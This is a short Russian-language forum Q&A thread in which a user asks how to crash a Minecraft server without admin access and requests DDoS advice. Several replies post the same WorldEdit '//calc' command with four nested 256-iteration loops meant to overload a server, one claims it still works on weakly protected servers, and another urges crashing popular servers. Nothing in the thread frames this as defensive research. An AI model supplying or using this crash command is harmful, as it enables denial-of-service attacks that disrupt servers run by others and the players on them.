Время игр
+1Как крашнуть сервер Minecraft?
Дополнен Дополнен
без админки
и желательно без захода) ) ддос какой посоветуйте
Не как если только прогу установить.
.
С
.
//calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}}
Ну я вижк то что это было 4 года назат но есть такая команда каторая на топ серверах не робит а вот на школо серверах вазможно: //calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}}
//calc for(i=0;i<256;i++){for(j=0;j<256;j++){for(k=0;k<256;k++){for(l=0;l<256;l++){ln(pi)}}}} красава!!!!
Крашни, пожалуйста, одни из самых известных